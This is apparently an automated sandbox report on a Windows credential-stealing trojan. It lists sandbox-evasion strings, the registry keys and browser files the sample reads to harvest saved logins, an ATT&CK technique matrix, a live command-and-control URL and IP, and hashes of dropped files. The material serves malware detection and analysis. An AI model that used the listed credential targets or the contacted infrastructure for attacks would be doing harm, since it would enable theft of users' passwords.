          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dllJump to dropped file
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_0040626D FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_004026FE FindFirstFileA,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeAPI call chain: ExitProcess graph end node
          Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: HfJLn9erXb.exe, 00000007.00000002.1394683653.0000000002318000.00000004.00000020.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.0000000002324000.00000004.00000020.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_735D1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_00402D63 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: HfJLn9erXb.exe PID: 2912, type: MEMORYSTR
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: HfJLn9erXb.exe PID: 2912, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API
          1
          DLL Side-Loading
          1
          Access Token Manipulation
          1
          Masquerading
          2
          OS Credential Dumping
          11
          Security Software Discovery
          Remote Services1
          Email Collection
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
          Process Injection
          1
          Virtualization/Sandbox Evasion
          1
          Credentials in Registry
          1
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth1
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)1
          DLL Side-Loading
          1
          Access Token Manipulation
          Security Account Manager3
          File and Directory Discovery
          SMB/Windows Admin Shares2
          Data from Local System
          Automated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
          Process Injection
          NTDS5
          System Information Discovery
          Distributed Component Object Model1
          Clipboard Data
          Scheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information
          LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading
          Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          HfJLn9erXb.exe51%ReversingLabsWin32.Trojan.Nemesis
          HfJLn9erXb.exe54%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsb2DEE.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll0%ReversingLabs
          SourceDetectionScannerLabelLinkDownload
          7.0.HfJLn9erXb.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          2.0.HfJLn9erXb.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          2.2.HfJLn9erXb.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          SourceDetectionScannerLabelLink
          ruhsalgelisim.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
          http://ruhsalgelisim.com/jgEyxsZj50.ttf0%Avira URL Cloudsafe
          http://ruhsalgelisim.com/jgEyxsZj50.ttf0%VirustotalBrowse
          http://185.246.220.85/habrik/five/fre.php100%Avira URL Cloudmalware
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          ruhsalgelisim.com
          85.95.248.49
          truefalseunknown
          NameMaliciousAntivirus DetectionReputation
          http://ruhsalgelisim.com/jgEyxsZj50.ttffalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://185.246.220.85/habrik/five/fre.phptrue
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdHfJLn9erXb.exe, 00000007.00000001.1217313379.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdHfJLn9erXb.exe, 00000007.00000001.1217313379.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorHfJLn9erXb.exefalse
            high
            http://nsis.sf.net/NSIS_ErrorErrorHfJLn9erXb.exefalse
              high
              http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDHfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000626000.00000020.00000001.01000000.00000007.sdmpfalse
                high
                http://www.gopher.ftp://ftp.HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                85.95.248.49
                ruhsalgelisim.comTurkey
                49467EUROTA-ASNEUROTAINTERNETSERVICESLTDTRfalse
                185.246.220.85
                unknownGermany
                10753LVLT-10753UStrue
                Joe Sandbox Version:37.0.0 Beryl
                Analysis ID:829104
                Start date and time:2023-03-17 20:56:49 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 14m 23s
                Hypervisor based Inspection enabled:false
                Report type:light
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                Number of analysed new started processes analysed:24
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:HfJLn9erXb.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@4/19@1/2
                EGA Information:
                • Successful, ratio: 50%
                HDC Information:
                • Successful, ratio: 37% (good quality ratio 36.2%)
                • Quality average: 88.9%
                • Quality standard deviation: 21.5%
                HCA Information:
                • Successful, ratio: 82%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe, UsoClient.exe
                • TCP Packets have been reduced to 100
                • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target HfJLn9erXb.exe, PID 2912 because there are no executed function
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                No context
                No context
                No context
                No context
                No context
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):54
                Entropy (8bit):4.838039816898156
                Encrypted:false
                SSDEEP:3:7KG/LmI/cXQQLQIfLBJXmgxv:OG/LmI/cXQQkIP2I
                MD5:FB5EE2C0CAC332EC8390F50016EF0769
                SHA1:11D9FB52FE5289140B9D52A38B56F99512B3A3A7
                SHA-256:C557AFE51AB22916E3423820A09D3805BF9DCDCECBEC4FE8DE2C67FB023BA631
                SHA-512:87CCEA7B203B8BFC4E21544FE4FE9693AF230E246C450E673410565791DFE8257E30354772FDCC114C7068D9295FDB491E9B52D1A3B490C0756E568B70B95C0A
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:[Bedrock]..Interthing=user32::EnumWindows(i r1 ,i 0)..
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):11776
                Entropy (8bit):5.832316471889005
                Encrypted:false
                SSDEEP:192:4PtkiQJr7jHYT87RfwXQ6YSYtOuVDi7IsFW14Ll8CO:H78TQIgGCDp14LGC
                MD5:B0C77267F13B2F87C084FD86EF51CCFC
                SHA1:F7543F9E9B4F04386DFBF33C38CBED1BF205AFB3
                SHA-256:A0CAC4CF4852895619BC7743EBEB89F9E4927CCDB9E66B1BCD92A4136D0F9C77
                SHA-512:F2B57A2EEA00F52A3C7080F4B5F2BB85A7A9B9F16D12DA8F8FF673824556C62A0F742B72BE0FD82A2612A4B6DBD7E0FDC27065212DA703C2F7E28D199696F66E
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:moderate, very likely benign file
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....oZ...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:data
                Category:dropped
                Size (bytes):47
                Entropy (8bit):1.1262763721961973
                Encrypted:false
                SSDEEP:3:/lSllIEXln:AWE1
                MD5:D69FB7CE74DAC48982B69816C3772E4E
                SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
                SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
                SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
                Malicious:false
                Preview:........................................user.
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):34016
                Entropy (8bit):6.1021284380541925
                Encrypted:false
                SSDEEP:384:JP7a6wQdSCVWSdoEdXjYmxzfkfIwuWR7UPMEdxsTStsBdMQJK2wKucYkcuhV3:N7a6eiHdFdr7W5UPMgy+OBG2X90uhV3
                MD5:4FC7FC174E80C178225C2509027DF961
                SHA1:9FF62413EC0DD462F5F016EBC804F1D736D24796
                SHA-256:866B31DD39B97DEDAFD0FBD5672639EE91B47AD319C47816B4F6D01BFF93FF8C
                SHA-512:29261B9ABC4AF2F51C05B61A37721BC737B411530361A4B48A7BFFAB0F8263EA75BFD51B6E6E94E91E1D02DC442B534C3334B05FD8324E7CF307FA08179A1ED9
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Z.oPZ.oPZ.oPS..PR.oP..nQX.oP..jQK.oP..kQR.oP..lQX.oP).nQY.oPZ.nPt.oP..fQY.oP..oQ[.oP..P[.oPZ..P[.oP..mQ[.oPRichZ.oP........PE..d....5;a.........." .....0...:.......................................................F....`..........................................\.......]..........H............f..........H....O..p...........................@P...............@..p............................text............0.................. ..`.rdata...#...@...$...4..............@..@.data...@....p.......X..............@....pdata...............Z..............@..@.rsrc...H............^..............@..@.reloc..H............d..............@..B................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:data
                Category:dropped
                Size (bytes):297815
                Entropy (8bit):6.803960139750454
                Encrypted:false
                SSDEEP:6144:J35PGszPFp+EB9h18KeMJwYQl/w+ByCHqLBmv:J3FGsz93N8Kp60Bg
                MD5:12DF13549A2F50FB06EAAC92D2F36C05
                SHA1:5E1CD0421664E97B44B2C26960F4D298DAED0C99
                SHA-256:4EE38AAF3380FB3D7C4F57800A1692175C1D772E3A11028874CF2D8F5DC599F2
                SHA-512:6DD5811B457913D37B922904678A508A1762CDA447C195A660457B19D6302DB8E21586AFF0F22D41D73514CA926FEFE8554777EB558BD321ABF5B76C06527848
                Malicious:false
                Preview:.........T.........h........................@...KK.........[......W......b...................F................,........DD.......WW...................[..........P.'.........hhh.......^^....JJ....x.......F......aaa............................!............IIII...............WW.i......\\..................q.22...........m...555...........m..7.k......m...................c.QQ.........................,.......cc...........?..xxx...............4.........^.....................]].444.XX.........................................ggg..........]....jjjjj..77...........bbb...<<.................++......XX.......!!..qqq...............@.......eeee........[................00.A............................H.yyyyy.....FFFFF..kk.555........lll...H........ssss...MM..j........G...^^...........~.........PP............. ...............III.....}}}...........................""".....))...UU...l.)))).........++...%%..........######....hhh............::..^.5.....(((..............................n..""........zzzzzz......
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:data
                Category:dropped
                Size (bytes):42836
                Entropy (8bit):4.578518141395867
                Encrypted:false
                SSDEEP:768:AGQ+v3ebyf4b4Yv6Dub2I+MxA83BMUBaPqbIvcbYIrf:NQ+WApD42MxBMMaPqbZbYIrf
                MD5:3DAD0F9AF0356D18A46167665A352768
                SHA1:E5D083D2224DE4FC9105CB966CF3A53F9BB7D3C0
                SHA-256:8A124F4091887491B8FABE0C0C694B95C2D76F68FB4E9292C59FA5971074899C
                SHA-512:7CD0CF5AF5B79A146F22A2D68CC3500AF6068F1BFA48B5730E2C2236201E4B6B7CCED4DBB9121A525F41FC63C07403D1CB40F9267FBF81C5FFC2CB4FA6221E98
                Malicious:false
                Preview:.....WWW.......T..00.............A............>>>.lll.......NNNN........&...........s.$$$....................................++.;;;;...................TT........l.o..........ll.......vv.............+..............V.....'.>.....a....................y.!...{{{.11.<...333......................6666....ee................_.........5......88.............%%..<...........R.................................]]]].........888..............a.n..C.............>............P.....;;.....HHH.........bb.........eee...............QQ..cc..`....................................b.w.......--......GGG...JJJ.U......uu.VV....v..ii. ............FF.........K........................1.............44444.........................QQQ....,.//.....w...........ll.....SS....(.......H............B.....OOOO.........__....l..........................}..//.vvvv....ii................~~~..EEE..MM..............L.@@.....G...........:.................888..........))..............?......FF.......DDDD..............@@@@@...................
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):140
                Entropy (8bit):5.529383944212929
                Encrypted:false
                SSDEEP:3:yionv//thPl9vt3lAnsrtxBllDM9vFW0p/sXm1MMos9DwlTYTbklt/sbp:6v/lhPysx8vFW0pkX4iZlTYTI3Ebp
                MD5:4308BBBAB1DB146494AE5ABB07B8E6DB
                SHA1:58121574EEB070E26DDD75A964F3548E176E58A4
                SHA-256:EFB732049C674EB25BFCB2FA0CBCC45D24190BF1479C054647F424B31E34C828
                SHA-512:41C9B37516F8D6AB7155F890EE36C26FE4161383A93BFBF696AB18292774C3556642E898361D21CECCBFEFFAF5814495CFAC2C74791E02F068B055BD3AD87DE4
                Malicious:false
                Preview:.PNG........IHDR................a....sBIT....|.d....CIDAT8.c`.J..R..(...\.`..2.Y3...k.i......b..PN.....J.@6.l.`.Pd..A.....O...D....IEND.B`.
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):147
                Entropy (8bit):5.834297280344084
                Encrypted:false
                SSDEEP:3:yionv//thPl9vt3lAnsrtxBllPhF1MzoQxJrN7djpdXLImeR/mV2kg1p:6v/lhPysx1MzoQxlRZbCRaip
                MD5:38D787F55E22FB591135F9250CD259D4
                SHA1:0E135B0E1CA49A6E43DB4CB7596FAEA022E23924
                SHA-256:1ED839B015A67CAB9948469975411D982A96314CE82851EA2F9F6BB8D733A002
                SHA-512:4E21AB54B7110B4CD2EBC0E2CF6DF3F8C7C988495BCCA76949BC3C5EB669A793FCCDA5CB4DDB7B627A21734BD181FE44670757144CC2A007FCB695405F08EC2B
                Malicious:false
                Preview:.PNG........IHDR................a....sBIT....|.d....JIDAT8.c`..0b..O..&J]@5....tR.>........`.8.(6....-Z....a..&..3 ....4...<.............IEND.B`.
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                Category:dropped
                Size (bytes):9515
                Entropy (8bit):5.04214621707661
                Encrypted:false
                SSDEEP:192:icoGT04mzNN8hYivh5gtE/PkjY09fdNQuQ:ibGg4mzNhi4tEHoDfHQuQ
                MD5:7B02E1AE16E2E709D7C97DE560B4DBE9
                SHA1:191A54644417F7D36F5CB4182DCDB3737D74BE51
                SHA-256:DA0B58F52BBC131F967942D1D8E9DE1B5721AE864BC21852A0AD4062332297CB
                SHA-512:4F689F854DB3F766B5E53CE2F19E9F8293C075EE3F9B18098EB05B352F2EC95DF85E49A78540781EB531BCE60C7B1F7890F1FE3C65200DEC3CB908E90FB827A1
                Malicious:false
                Preview:.;!@Lang2@!UTF-8!..; : Francisco Jr..; 4.37 : Fabricio Biazzotto ..; 18.05 : Atualizado por Felipe..;..;..;..;..;..;..;..;..0..7-Zip..Portuguese Brazilian..Portugu.s Brasileiro..401..OK..Cancelar........&Sim..&N.o..&Fechar..Ajuda....&Continuar..440..Sim pra &Todos..N.o pra T&odos..Parar..Reiniciar..&Em 2. plano..&Em 1. plano..&Pausar..Pausado..Voc. tem certeza que voc. quer cancelar?..500..&Arquivo..&Editar..&Visualizar..F&avoritos..&Ferramentas..&Ajuda..540..&Abrir..Abrir &por Dentro..Abrir p&or Fora..&Visualizar..&Editar..Re&nomear..&Copiar Para.....&Mover Para.....&Apagar..&Dividir arquivo.....Com&binar arquivos.....P&ropriedades..Comen&t.rio..Calcular checksum..Diff..Criar Pasta..Criar Arquivo..S&air..Link..&Correntes Alternantes..600..Selecionar &Tudo..Desmarcar Tudo..&Inverter Sele..o..Selecionar.....Desmarcar.....Selecionar por Tipo..Desfazer sele..o por Tipo..700...co&nes Grandes...c&ones Pequenos..&Lista..&Detalhes..730..Desorganizado..Visualiza..o
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:SVG Scalable Vector Graphics image
                Category:dropped
                Size (bytes):266
                Entropy (8bit):4.986245244009802
                Encrypted:false
                SSDEEP:6:tI9mc4slzc8SRIKMNo/aMhFl1OkUjq5eKVrGDVfqKlNK+:t4C8LKMuyMhPobjoprGDRlj
                MD5:8B727826F9D8C0C7C954EDE912CB0DEB
                SHA1:1518AA80747326B5353C22D32E57A33D61285119
                SHA-256:0783A7F518D3879C8F0F50B45FBD779A98652469E9B7C659CE41F14D1629D334
                SHA-512:0ABB243F9D1E0B6EDA0CB25D35C3449AB2B5B83078208F11B876A27FF11FF70B79F8BA97D4DA3AED21A8314C75FB2174D9378AF59B57DCB99DFF681D9AAB8561
                Malicious:false
                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">. <path d="M8 1a3 3 0 100 6 3 3 0 000-6zM6.5 8A4.49 4.49 0 002 12.5V14c0 1 1 1 1 1h10s1 0 1-1v-1.5A4.49 4.49 0 009.5 8z" style="marker:none" color="#bebebe" overflow="visible" fill="#2e3436"/>.</svg>.
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                Category:dropped
                Size (bytes):12193
                Entropy (8bit):4.4720152705808935
                Encrypted:false
                SSDEEP:192:i2PDEeaNB1PmcptkcDHxbTvPnc67bMxQxGx4ch/JuLQRcg/oN96bPNljYiYr197:ikDFKBFmcPLx3HPnIsqrJuqcgAN96b87
                MD5:3C21135144AC7452E7DB66F0214F9D68
                SHA1:B1EC0589D769EAB5E4E8F0F8C21B157EF5EBB47D
                SHA-256:D095879B8BBC67A1C9875C5E9896942BACF730BD76155C06105544408068C59E
                SHA-512:0446A0E2570A1F360FD8700FD4C869C7E2DBB9476BBDEC2526A53844074C79691542B91455343C50941B8A6D5E02A58EE6AA539CC4C4AE9CF000B4034EF663E2
                Malicious:false
